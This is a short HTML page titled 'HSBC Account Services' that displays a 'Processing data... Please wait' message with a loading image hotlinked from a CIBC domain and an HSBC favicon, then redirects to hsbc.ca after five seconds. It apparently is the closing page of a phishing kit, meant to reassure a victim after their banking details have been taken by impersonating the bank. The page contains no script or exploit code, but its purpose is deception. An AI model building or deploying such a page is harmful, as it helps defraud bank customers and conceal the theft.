<html>
      <head>
       <LINK href="js/snsStyles.css" rel="stylesheet" type="text/css">
	   
		 <link href='https://www.business.hsbc.co.uk/htse-ukbib-themeskins-servlet/themes/html/hsbcukbib_jhx_1_6/images/favicon.ico' rel="shortcut icon" type="image/ico"/>
		<META HTTP-EQUIV="Refresh" CONTENT="5;URL=https://www.hsbc.ca">
       <title>
        HSBC Account Services
       </title>
       
	
	 
	 	
	 
	  <style type="text/css">
           
             #signOutContent {
   margin:150px 0 0 0;
  }

  #signOutTxt {
   font:normal 18px Arial;
   color:#333333;
  }

  #main-txt {
    margin:33px 0 0 0;
  }

  #signout-circle {
    margin:46px 0 0 0
  }

  #signout-main {
   width:100%;
   text-align:center;
  }
	  </style>
	 </head>	 
	 <body>	 
          <div id="signout-main"> 
	   <div id="signOutContent">
	   </div>	  
	   <div id="main-txt">
	    <span id="signOutTxt">
	     Processing data..... &nbsp;Please wait.....
	    </span>
	   </div>	  
	   <div id="signout-circle">
	    <img src="https://www.cibc.mobi/ebm-mobile-mm/doc/images/common/loading.gif" />
           </div>	 
          </div>
</body>
</html>